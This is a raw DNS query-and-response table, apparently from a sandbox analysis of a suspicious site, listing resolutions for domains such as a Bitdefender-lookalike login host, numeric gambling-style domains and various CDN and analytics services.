                                                                                                                                                          Jun 10, 2024 00:41:44.891577005 CEST192.168.2.51.1.1.10xad75Standard query (0)ahd-ocssn.qqxgo.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.378376961 CEST192.168.2.51.1.1.10x97f2Standard query (0)static.meiqia.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.378602982 CEST192.168.2.51.1.1.10x5040Standard query (0)static.meiqia.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.391952991 CEST192.168.2.51.1.1.10x81e1Standard query (0)cstaticdun.126.netA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.392148972 CEST192.168.2.51.1.1.10xae05Standard query (0)cstaticdun.126.net65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.419101000 CEST192.168.2.51.1.1.10x8496Standard query (0)wssa-341.dalianjrkj.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.419327974 CEST192.168.2.51.1.1.10x4241Standard query (0)_1586._https.wssa-341.dalianjrkj.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.658729076 CEST192.168.2.51.1.1.10x51e5Standard query (0)ocsapi-lc.tingmeikj.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.658930063 CEST192.168.2.51.1.1.10xa203Standard query (0)ocsapi-lc.tingmeikj.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.661650896 CEST192.168.2.51.1.1.10x89ecStandard query (0)wssa-381.moceand.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.661839008 CEST192.168.2.51.1.1.10x1d13Standard query (0)_1986._https.wssa-381.moceand.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.697575092 CEST192.168.2.51.1.1.10x2fa2Standard query (0)cstaticdun.126.netA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.697705984 CEST192.168.2.51.1.1.10xe957Standard query (0)cstaticdun.126.net65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.797051907 CEST192.168.2.51.1.1.10x451cStandard query (0)wssa-381.moceand.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.797216892 CEST192.168.2.51.1.1.10x8ff4Standard query (0)_1986._https.wssa-381.moceand.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.805247068 CEST192.168.2.51.1.1.10x10c3Standard query (0)edge-api.meiqia.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.805483103 CEST192.168.2.51.1.1.10xf0fcStandard query (0)edge-api.meiqia.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.828970909 CEST192.168.2.51.1.1.10xc12eStandard query (0)edge-api.meiqia.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.829248905 CEST192.168.2.51.1.1.10x23b5Standard query (0)edge-api.meiqia.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:46.078972101 CEST192.168.2.51.1.1.10xdb37Standard query (0)cstaticdun.126.netA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:46.079184055 CEST192.168.2.51.1.1.10xc4a2Standard query (0)cstaticdun.126.net65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:49.878089905 CEST192.168.2.51.1.1.10x9f2bStandard query (0)cstaticdun.126.netA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:49.878230095 CEST192.168.2.51.1.1.10x7876Standard query (0)cstaticdun.126.net65IN (0x0001)false
                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                          Jun 10, 2024 00:40:23.743041992 CEST1.1.1.1192.168.2.50x6477Server failure (2)www.bitdefenderlogin.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:23.764883995 CEST1.1.1.1192.168.2.50xd84eNo error (0)www.bitdefenderlogin.com156.225.145.162A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:24.431212902 CEST1.1.1.1192.168.2.50xae5aServer failure (2)www.bitdefenderlogin.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:25.906959057 CEST1.1.1.1192.168.2.50x28c3No error (0)www.google.com142.250.186.36A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:25.906975985 CEST1.1.1.1192.168.2.50x7940No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:26.589468002 CEST1.1.1.1192.168.2.50x3a40Server failure (2)www.698jbwad.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:26.753264904 CEST1.1.1.1192.168.2.50x5a96No error (0)www.698jbwad.com103.234.73.28A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:27.267424107 CEST1.1.1.1192.168.2.50xbd36Server failure (2)www.698jbwad.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:27.796612978 CEST1.1.1.1192.168.2.50xb79fServer failure (2)www.bitdefenderlogin.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:28.130929947 CEST1.1.1.1192.168.2.50x7ed2No error (0)www.bitdefenderlogin.com156.225.145.162A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:28.487205982 CEST1.1.1.1192.168.2.50x58bServer failure (2)www.bitdefenderlogin.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:28.916877985 CEST1.1.1.1192.168.2.50xfeeNo error (0)js.users.51.lajs.users.51.la.w.cdngslb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:28.916877985 CEST1.1.1.1192.168.2.50xfeeNo error (0)js.users.51.la.w.cdngslb.com163.181.92.245A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:28.916877985 CEST1.1.1.1192.168.2.50xfeeNo error (0)js.users.51.la.w.cdngslb.com163.181.92.246A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:28.916877985 CEST1.1.1.1192.168.2.50xfeeNo error (0)js.users.51.la.w.cdngslb.com163.181.92.241A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:28.916877985 CEST1.1.1.1192.168.2.50xfeeNo error (0)js.users.51.la.w.cdngslb.com163.181.92.250A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:28.916877985 CEST1.1.1.1192.168.2.50xfeeNo error (0)js.users.51.la.w.cdngslb.com163.181.92.226A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:28.916877985 CEST1.1.1.1192.168.2.50xfeeNo error (0)js.users.51.la.w.cdngslb.com163.181.92.243A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:28.916877985 CEST1.1.1.1192.168.2.50xfeeNo error (0)js.users.51.la.w.cdngslb.com163.181.92.225A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:28.916877985 CEST1.1.1.1192.168.2.50xfeeNo error (0)js.users.51.la.w.cdngslb.com163.181.92.249A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:29.105278015 CEST1.1.1.1192.168.2.50xdd88No error (0)js.users.51.lajs.users.51.la.w.cdngslb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:29.254089117 CEST1.1.1.1192.168.2.50xdcd1Server failure (2)www.698jbwad.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:29.471697092 CEST1.1.1.1192.168.2.50x3811No error (0)www.image110.com103.85.191.78A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:29.501780033 CEST1.1.1.1192.168.2.50xd7ffServer failure (2)www.image110.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:29.509999037 CEST1.1.1.1192.168.2.50x7f95Server failure (2)www.image110.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:29.579911947 CEST1.1.1.1192.168.2.50x8166No error (0)www.698jbwad.com103.234.73.28A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:29.994782925 CEST1.1.1.1192.168.2.50x8926Server failure (2)www.698jbwad.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:31.383903980 CEST1.1.1.1192.168.2.50x703bNo error (0)f21714.com38.174.148.2A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:31.679136038 CEST1.1.1.1192.168.2.50xe219No error (0)www.image110.com103.85.191.78A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:32.013564110 CEST1.1.1.1192.168.2.50x4f4aServer failure (2)www.image110.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:34.649933100 CEST1.1.1.1192.168.2.50xae23No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:34.649933100 CEST1.1.1.1192.168.2.50xae23No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:36.462934971 CEST1.1.1.1192.168.2.50x80d1No error (0)x551005.com38.174.148.43A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:39.622322083 CEST1.1.1.1192.168.2.50xb028No error (0)x551005.com38.174.148.43A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:40.288232088 CEST1.1.1.1192.168.2.50x2a0fNo error (0)hg679.cc202.61.87.219A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:40.288232088 CEST1.1.1.1192.168.2.50x2a0fNo error (0)hg679.cc202.61.87.247A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:40.288232088 CEST1.1.1.1192.168.2.50x2a0fNo error (0)hg679.cc202.61.87.224A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.329946995 CEST1.1.1.1192.168.2.50xbb8bName error (3)_1186._https.wssa-301.shiwanxin.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.331368923 CEST1.1.1.1192.168.2.50xc55aNo error (0)wssa-301.shiwanxin.comwssa-301.shiwanxin.com.cdn20.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.331368923 CEST1.1.1.1192.168.2.50xc55aNo error (0)wssa-301.shiwanxin.com.cdn20.com163.171.137.177A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.352269888 CEST1.1.1.1192.168.2.50xc8f0Name error (3)wssa-371.laorrey.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.352530956 CEST1.1.1.1192.168.2.50x2318Name error (3)_1886._https.wssa-371.laorrey.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.394393921 CEST1.1.1.1192.168.2.50xf58eName error (3)wssa-371.laorrey.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.402539015 CEST1.1.1.1192.168.2.50xde71No error (0)api.tongjiniao.com53d2428abcce5bfebd1c0937e6ac188cdx73dx23y.cname88.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.402539015 CEST1.1.1.1192.168.2.50xde71No error (0)53d2428abcce5bfebd1c0937e6ac188cdx73dx23y.cname88.com110.42.7.114A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.405682087 CEST1.1.1.1192.168.2.50x44b6No error (0)ia.51.laia.51.la.trpcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.405682087 CEST1.1.1.1192.168.2.50x44b6No error (0)ia.51.la.trpcdn.netzcmcm.v.trpcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.509146929 CEST1.1.1.1192.168.2.50xea2fNo error (0)ocsapi1961.hydqef.com7znfi17mcwot775b.aliyunddos0015.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.509146929 CEST1.1.1.1192.168.2.50xea2fNo error (0)7znfi17mcwot775b.aliyunddos0015.comocsapi1961.hydqef.com.w.cdngslb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.538012028 CEST1.1.1.1192.168.2.50x2f70No error (0)ia.51.laia.51.la.trpcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.538012028 CEST1.1.1.1192.168.2.50x2f70No error (0)ia.51.la.trpcdn.netzcmcm.v.trpcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.538012028 CEST1.1.1.1192.168.2.50x2f70No error (0)zcmcm.v.trpcdn.net154.85.69.2A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.538012028 CEST1.1.1.1192.168.2.50x2f70No error (0)zcmcm.v.trpcdn.net154.85.69.11A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.538012028 CEST1.1.1.1192.168.2.50x2f70No error (0)zcmcm.v.trpcdn.net154.85.69.9A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.538012028 CEST1.1.1.1192.168.2.50x2f70No error (0)zcmcm.v.trpcdn.net154.85.69.3A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.538012028 CEST1.1.1.1192.168.2.50x2f70No error (0)zcmcm.v.trpcdn.net154.85.69.6A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.538012028 CEST1.1.1.1192.168.2.50x2f70No error (0)zcmcm.v.trpcdn.net154.85.69.4A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.538012028 CEST1.1.1.1192.168.2.50x2f70No error (0)zcmcm.v.trpcdn.net154.85.69.10A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.538012028 CEST1.1.1.1192.168.2.50x2f70No error (0)zcmcm.v.trpcdn.net154.85.69.7A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.538012028 CEST1.1.1.1192.168.2.50x2f70No error (0)zcmcm.v.trpcdn.net154.85.69.5A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.538012028 CEST1.1.1.1192.168.2.50x2f70No error (0)zcmcm.v.trpcdn.net154.85.69.8A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.624387980 CEST1.1.1.1192.168.2.50x8403No error (0)ocsapi1961.hydqef.com7znfi17mcwot775b.aliyunddos0015.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.624387980 CEST1.1.1.1192.168.2.50x8403No error (0)7znfi17mcwot775b.aliyunddos0015.comocsapi1961.hydqef.com.w.cdngslb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.624387980 CEST1.1.1.1192.168.2.50x8403No error (0)ocsapi1961.hydqef.com.w.cdngslb.com47.246.46.248A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.624387980 CEST1.1.1.1192.168.2.50x8403No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.241A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.624387980 CEST1.1.1.1192.168.2.50x8403No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.131.225A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.624387980 CEST1.1.1.1192.168.2.50x8403No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.246A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.624387980 CEST1.1.1.1192.168.2.50x8403No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.226A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.624387980 CEST1.1.1.1192.168.2.50x8403No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.249A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.624387980 CEST1.1.1.1192.168.2.50x8403No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.245A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.624387980 CEST1.1.1.1192.168.2.50x8403No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.225A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.624387980 CEST1.1.1.1192.168.2.50x8403No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.243A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.624387980 CEST1.1.1.1192.168.2.50x8403No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.250A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:42.726658106 CEST1.1.1.1192.168.2.50x153cNo error (0)api.tongjiniao.com53d2428abcce5bfebd1c0937e6ac188cdx73dx23y.cname88.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:43.023736954 CEST1.1.1.1192.168.2.50xf92fNo error (0)hg679.cc202.61.87.247A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:43.023736954 CEST1.1.1.1192.168.2.50xf92fNo error (0)hg679.cc202.61.87.224A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:43.023736954 CEST1.1.1.1192.168.2.50xf92fNo error (0)hg679.cc202.61.87.219A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:43.708805084 CEST1.1.1.1192.168.2.50x9159No error (0)api.tongjiniao.com53d2428abcce5bfebd1c0937e6ac188cdx73dx23y.cname88.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:43.713371992 CEST1.1.1.1192.168.2.50xa256No error (0)api.tongjiniao.com53d2428abcce5bfebd1c0937e6ac188cdx73dx23y.cname88.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:43.713371992 CEST1.1.1.1192.168.2.50xa256No error (0)53d2428abcce5bfebd1c0937e6ac188cdx73dx23y.cname88.com110.42.7.114A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:43.979079008 CEST1.1.1.1192.168.2.50x5847Name error (3)_1186._https.wssa-301.shiwanxin.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.018395901 CEST1.1.1.1192.168.2.50x3615No error (0)e933002.com38.174.148.234A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.018395901 CEST1.1.1.1192.168.2.50x3615No error (0)e933002.com38.174.148.235A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.163629055 CEST1.1.1.1192.168.2.50xa17aNo error (0)wssa-301.shiwanxin.comwssa-301.shiwanxin.com.cdn20.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.163629055 CEST1.1.1.1192.168.2.50xa17aNo error (0)wssa-301.shiwanxin.com.cdn20.com163.171.137.177A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.473596096 CEST1.1.1.1192.168.2.50x189eNo error (0)ocsapi-aws.bakeddove.comd7xy0886tqf1j.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.488905907 CEST1.1.1.1192.168.2.50x2057No error (0)ocsapi-aka.blackkhaki918.comdcr053r0lmcyq.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.488905907 CEST1.1.1.1192.168.2.50x2057No error (0)dcr053r0lmcyq.cloudfront.net3.165.113.62A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.488905907 CEST1.1.1.1192.168.2.50x2057No error (0)dcr053r0lmcyq.cloudfront.net3.165.113.92A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.488905907 CEST1.1.1.1192.168.2.50x2057No error (0)dcr053r0lmcyq.cloudfront.net3.165.113.40A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.488905907 CEST1.1.1.1192.168.2.50x2057No error (0)dcr053r0lmcyq.cloudfront.net3.165.113.94A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.643224001 CEST1.1.1.1192.168.2.50x5193No error (0)ocsapi-aws.bakeddove.comd7xy0886tqf1j.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.643224001 CEST1.1.1.1192.168.2.50x5193No error (0)d7xy0886tqf1j.cloudfront.net18.66.147.55A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.643224001 CEST1.1.1.1192.168.2.50x5193No error (0)d7xy0886tqf1j.cloudfront.net18.66.147.35A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.643224001 CEST1.1.1.1192.168.2.50x5193No error (0)d7xy0886tqf1j.cloudfront.net18.66.147.121A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.643224001 CEST1.1.1.1192.168.2.50x5193No error (0)d7xy0886tqf1j.cloudfront.net18.66.147.91A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.654642105 CEST1.1.1.1192.168.2.50xf7deNo error (0)ocsapi-aka.blackkhaki918.comdcr053r0lmcyq.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.720206976 CEST1.1.1.1192.168.2.50x9dddNo error (0)ocsapi1961.wwwbyfen.comf5azo56y7xsh9xdq.aliyunddos0015.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.720206976 CEST1.1.1.1192.168.2.50x9dddNo error (0)f5azo56y7xsh9xdq.aliyunddos0015.comocsapi1961.wwwbyfen.com.w.cdngslb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.720206976 CEST1.1.1.1192.168.2.50x9dddNo error (0)ocsapi1961.wwwbyfen.com.w.cdngslb.comoffline.specialcdnstatus.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.720206976 CEST1.1.1.1192.168.2.50x9dddNo error (0)offline.specialcdnstatus.com169.254.254.254A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.738624096 CEST1.1.1.1192.168.2.50xd87No error (0)ocsapi1961.hydqef.com7znfi17mcwot775b.aliyunddos0015.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.738624096 CEST1.1.1.1192.168.2.50xd87No error (0)7znfi17mcwot775b.aliyunddos0015.comocsapi1961.hydqef.com.w.cdngslb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.811631918 CEST1.1.1.1192.168.2.50xb295No error (0)ocsapi1961.hydqef.com7znfi17mcwot775b.aliyunddos0015.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.811631918 CEST1.1.1.1192.168.2.50xb295No error (0)7znfi17mcwot775b.aliyunddos0015.comocsapi1961.hydqef.com.w.cdngslb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.811631918 CEST1.1.1.1192.168.2.50xb295No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.226A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.811631918 CEST1.1.1.1192.168.2.50xb295No error (0)ocsapi1961.hydqef.com.w.cdngslb.com47.246.46.241A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.811631918 CEST1.1.1.1192.168.2.50xb295No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.131.227A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.811631918 CEST1.1.1.1192.168.2.50xb295No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.245A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.811631918 CEST1.1.1.1192.168.2.50xb295No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.225A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.811631918 CEST1.1.1.1192.168.2.50xb295No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.250A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.811631918 CEST1.1.1.1192.168.2.50xb295No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.246A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.811631918 CEST1.1.1.1192.168.2.50xb295No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.243A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.811631918 CEST1.1.1.1192.168.2.50xb295No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.249A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.811631918 CEST1.1.1.1192.168.2.50xb295No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.241A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.956656933 CEST1.1.1.1192.168.2.50x2c5eNo error (0)ocsapi1961.wwwbyfen.comf5azo56y7xsh9xdq.aliyunddos0015.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.956656933 CEST1.1.1.1192.168.2.50x2c5eNo error (0)f5azo56y7xsh9xdq.aliyunddos0015.comocsapi1961.wwwbyfen.com.w.cdngslb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:44.956656933 CEST1.1.1.1192.168.2.50x2c5eNo error (0)ocsapi1961.wwwbyfen.com.w.cdngslb.comoffline.specialcdnstatus.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:45.026488066 CEST1.1.1.1192.168.2.50x1db7No error (0)ia.51.laia.51.la.trpcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:45.026488066 CEST1.1.1.1192.168.2.50x1db7No error (0)ia.51.la.trpcdn.netzcmcm.v.trpcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:45.026488066 CEST1.1.1.1192.168.2.50x1db7No error (0)zcmcm.v.trpcdn.net154.85.69.6A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:45.026488066 CEST1.1.1.1192.168.2.50x1db7No error (0)zcmcm.v.trpcdn.net154.85.69.4A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:45.026488066 CEST1.1.1.1192.168.2.50x1db7No error (0)zcmcm.v.trpcdn.net154.85.69.10A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:45.026488066 CEST1.1.1.1192.168.2.50x1db7No error (0)zcmcm.v.trpcdn.net154.85.69.7A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:45.026488066 CEST1.1.1.1192.168.2.50x1db7No error (0)zcmcm.v.trpcdn.net154.85.69.5A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:45.026488066 CEST1.1.1.1192.168.2.50x1db7No error (0)zcmcm.v.trpcdn.net154.85.69.8A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:45.026488066 CEST1.1.1.1192.168.2.50x1db7No error (0)zcmcm.v.trpcdn.net154.85.69.2A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:45.026488066 CEST1.1.1.1192.168.2.50x1db7No error (0)zcmcm.v.trpcdn.net154.85.69.11A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:45.026488066 CEST1.1.1.1192.168.2.50x1db7No error (0)zcmcm.v.trpcdn.net154.85.69.9A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:45.026488066 CEST1.1.1.1192.168.2.50x1db7No error (0)zcmcm.v.trpcdn.net154.85.69.3A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:45.076445103 CEST1.1.1.1192.168.2.50x52f0No error (0)ia.51.laia.51.la.trpcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:45.076445103 CEST1.1.1.1192.168.2.50x52f0No error (0)ia.51.la.trpcdn.netzcmcm.v.trpcdn.netCNAME (Canonical name)IN (0x0001)false
